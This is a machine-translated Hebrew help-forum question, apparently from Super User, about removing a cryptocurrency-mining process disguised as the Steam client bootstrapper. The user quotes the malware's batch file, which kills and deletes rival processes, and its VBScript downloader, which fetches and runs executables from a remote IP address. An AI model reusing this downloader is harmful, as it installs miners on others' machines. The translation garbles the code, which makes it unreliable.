כיצד להרוג לצמיתות את לקוח האדים bootstrapper - משתמש סופר

יש לי את המצב הבא במנהל המשימות שלי:

אני לא יודע איזה סוג של יישום זה, אבל בהחלט לא לקוח bootstrapper קיטור כי אני לא להתקין את זה וגם לא יכול להסיר את זה.

אם אני מנסה להבין איזה סוג של יישום זה הוא באמצעות שלב זה:

אני רואה משהו כזה:

ב כלי השירות MS Config לא מצאתי שום דבר שנראה כמו secury.exe.

כשאני פותח את מיקום הקובץ, אני רואה שלושה קבצים:

m.bat, b.exe, 4.vbs.

להלן התוכן של m.bat:

המשימות / taskkill / f / t / im / tasker / f / t / im ieplare.exev taskkill / f / t / im מטאסקיל / f / t / im MSASCui.exe taskkill / F / t / im SystemSettlngs.exe taskkill / F / t / im SystemSetting.exe taskkill / F / t / im Process.exe taskkill / / f / t / im WinLnlt.exe taskkill / F / T / IM המשימות של WindowsUpgrade.exe / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / F / t / im apkls.exe taskkill / F / לא / IM winlog.exe taskkill / F / לא / im svchosts.exe taskkill / F / לא / win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / F / לא / Im TrustedInstaller.exe דל c: \ Windows \ System32 \ soiuos.exe del C \ \ Windows \ Setup \ TrustedInstaller.exe דל C: \ ProgramData \ kingsoft.exe דל C: \ ProgramData \ expl0rer.exe דל C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ \ D: C \ Pro גרסאות \ SystemSettlngs.exe דל C: \ ProgramData \ SystemSetting.exe דל C: \ ProgramData \ Process.exe דל C: \ ProgramData \ winlnlt.exe דל C: \ ProgramData \ WindowsUpgrade.exe דל c: \ ProgramData \ msdc.exe דל C: \ ProgramData \ Fiddlere.exe דל C: \ ProgramData \ shovst.exe דל C: \ ProgramData \ lqrtqe.exe דל C: \ ProgramData \ apkls.exe דל C: \ ProgramData \ winlog.exe דל C: \ ProgramData \ svchosts.exe דל C: \ ProgramData \ win1ogins.exe דל C: \ ProgramData \ shovsts.exe דל C: \ ProgramData \ fcty.exe דל C: \ ProgramData \ pool.exe דל C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe

הבא הולך 4.vbs:

קבע את xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 קבע xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.6.209.7:65510/pool.exe", 0 xPost.Send () set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell") .הפעל "C: \ ProgramData \ pool3.exe" CreateObject ( "הפעל את" C: \ ProgramData \ pool3.exe "

מה אני יכול לעשות כדי לעצור את secury.exe מפני ניצול לרעה של יכולות המחשוב של השרת שלי?

נ.ב. אני להורג את Avast בדיקה מלאה של המחשב שלי, אבל זה לא מצא שום דבר לא בסדר.